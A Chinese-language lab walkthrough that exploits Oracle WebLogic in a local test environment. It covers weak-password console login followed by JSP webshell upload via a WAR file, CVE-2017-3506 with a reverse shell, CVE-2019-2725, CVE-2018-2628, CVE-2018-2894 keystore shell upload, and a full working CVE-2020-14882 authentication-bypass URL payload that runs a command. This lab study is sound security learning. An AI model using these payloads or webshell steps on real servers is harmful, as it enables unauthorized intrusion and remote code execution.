常⻅中间件漏洞（WebLogic）靶场

1.后台弱⼝令GetShell

启动环境

默认账号密码：weblogic/Oracle@123 weblogic常⽤弱⼝令：https://cirt.net/passwords?criteria=weblogic 这⾥注意， 单个账号错误密码5次之后就会⾃动锁定。 172.16.1.51:7001/console/login/LoginForm.jsp 进来点击部署安装 进来点击上传文件 上传war包，jsp⽊⻢压缩成zip，修改后缀为war，上传 一直点击下一步来到保存点击保存 去哥斯拉连接 172.16.1.51:7001/1/1.jsp

2.CVE-2017-3506

开启环境并查看端口ip

进入/wls-wsat/CoordinatorPortType  验证漏洞是否存在

在当前页面抓包修改

返回kali监听6666端口反弹shell

3.CVE-2019-2725

这个还是用的上边的环境

访问/_async/AsyncResponseService 验证漏洞存在 在当前⻚⾯抓包 , 修改请求包 , 写⼊shell 然后放包去连接 http://ip/bea_wls_internal/sxy .jsp

4.CVE-2018-2628

开启环境查看端口

访问ip

使用工具检测漏洞存在

5.CVE-2018-2894

开启环境查看端口

获取密码：docker-compose logs | grep password

访问http://192.168.10.194:7001/console/login/LoginForm.jsp

拿刚才得到的账号密码登录

设置web服务测试开启： 域结构 -> base-domain -> ⾼级 -> 启动Web服务测试⻚ 点击保存 , 进⼊ config.do ⽂件进⾏设置，将⽬录设置为 ws_utc 应⽤的静态⽂件css⽬录，访问这个⽬录是⽆需权限的，这⼀点很重要 http://192.168.10.194:7001/ws_utc/config.do /u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css 点击安全 , 点击添加 右键审查元素 , 然后搜索16 , 找到对应时间戳 连接192.168.10.194 :7001/ws_utc/css/config/keystore/1726987575668_shell.jsp

6.CVE-2020-14882

192.168.10.194:7001/console/login/LoginForm.jsp  访问管理控制台

使⽤以下url绕过登录认证 http://192.168.10.194:7001/console/css/%252e%252e%252fconsole.portal

访问：http://192.168.10.194:7001 /console/css/%252e%252e%252fconsole.portal? _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runti me.getRuntime().exec('touch%20/tmp/success');") docker中可以看到命令已经成功运⾏了